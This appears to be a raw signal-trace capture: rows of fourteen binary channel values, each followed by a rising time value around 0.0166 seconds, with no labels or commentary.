0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622720e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622744e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6622972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6622996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623096e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623120e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6623124e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6623148e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6623172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623180e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623320e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623344e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623520e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623544e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623692e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623720e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623744e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623772e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623820e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623844e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623868e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623892e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623920e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6623948e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6623972e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624044e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6624052e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6624068e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6624092e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6624148e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6624172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624180e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624196e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624220e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624244e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624268e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624292e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624320e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624344e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624372e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624396e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624420e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624444e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624468e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624492e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624520e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624548e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624572e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624596e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624620e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624644e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624668e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624696e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624720e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6624724e-02 0,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6624772e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6624796e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624804e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6624972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6624996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625120e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625520e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625544e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625720e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625744e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6625972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6625996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626120e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626520e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626544e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626596e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626620e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626644e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626668e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626692e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626720e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626744e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626772e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626796e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626820e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626844e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626868e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626892e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626920e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626944e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6626972e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6626996e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627020e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627044e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627068e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627092e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627120e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627144e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627172e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627196e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627220e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627244e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627268e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627292e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627320e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627344e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627372e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627396e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627420e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627444e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627468e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627492e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627520e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627544e-02 0,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6627572e-02 0,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6627596e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6627600e-02 0,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6752356e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6752568e-02 1,1,1,1,0,1,0,0,0,1,0,1,0,1,1.6752584e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6752612e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,1,1.6752928e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,1,1.6752956e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6752960e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6752980e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6753004e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6753028e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6753052e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6753076e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6753100e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6753128e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,1,1.6753152e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,1,1.6753180e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753188e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753204e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753228e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753252e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753276e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753300e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6753308e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6753328e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6753352e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753360e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753380e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753404e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6753408e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6753452e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6753476e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753504e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753528e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753552e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753580e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753604e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753628e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753652e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753676e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753728e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753752e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753800e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753828e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753876e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753900e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6753956e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6753980e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754004e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754028e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754052e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754076e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6754084e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6754128e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6754156e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754160e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754180e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754204e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754252e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754276e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754328e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754352e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754404e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754428e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754452e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754476e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754500e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754528e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754580e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754604e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6754608e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6754652e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6754680e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754732e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754756e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754804e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754828e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754856e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754880e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754932e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6754956e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6754980e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755004e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755028e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755056e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755080e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755108e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755132e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755180e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755204e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6755212e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6755228e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6755256e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,1.6755260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755264e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755280e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755308e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755332e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755356e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755404e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755428e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755456e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755480e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755532e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755556e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755604e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755628e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755680e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755708e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755732e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755756e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755780e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755808e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755832e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755860e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755884e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755908e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755932e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6755956e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6755980e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756008e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756032e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756060e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756084e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756108e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756156e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756180e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756208e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6756212e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6756232e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6756260e-02 1,1,1,1,0,1,0,0,0,0,0,0,0,0,1.6756264e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756268e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756284e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756308e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6756312e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6756356e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6756384e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756388e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756408e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756432e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756508e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756532e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756556e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756580e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756636e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756660e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756732e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756784e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756808e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756860e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756884e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756908e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756932e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6756956e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6756980e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757036e-02 1,1,1,1,0,0,0,0,0,1,0,0,0,0,1.6757060e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6757064e-02 1,1,1,1,0,1,0,0,0,1,0,0,1,0,1.6757108e-02 1,1,1,1,0,1,0,0,0,1,0,0,0,0,1.6757132e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757140e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757184e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757208e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757260e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757284e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757308e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757332e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757356e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757380e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757408e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757432e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757460e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757484e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757508e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757536e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757560e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757588e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757612e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757636e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757660e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757684e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757708e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757736e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757760e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757788e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757812e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757836e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757884e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757908e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6757960e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6757988e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758036e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758060e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758108e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758136e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758160e-02 1,1,1,1,0,0,0,0,0,0,0,0,0,0,1.6758188e-02 1,1,1,1,0,0,0,0,0,0,0,0,1,0,1.6758212e-02 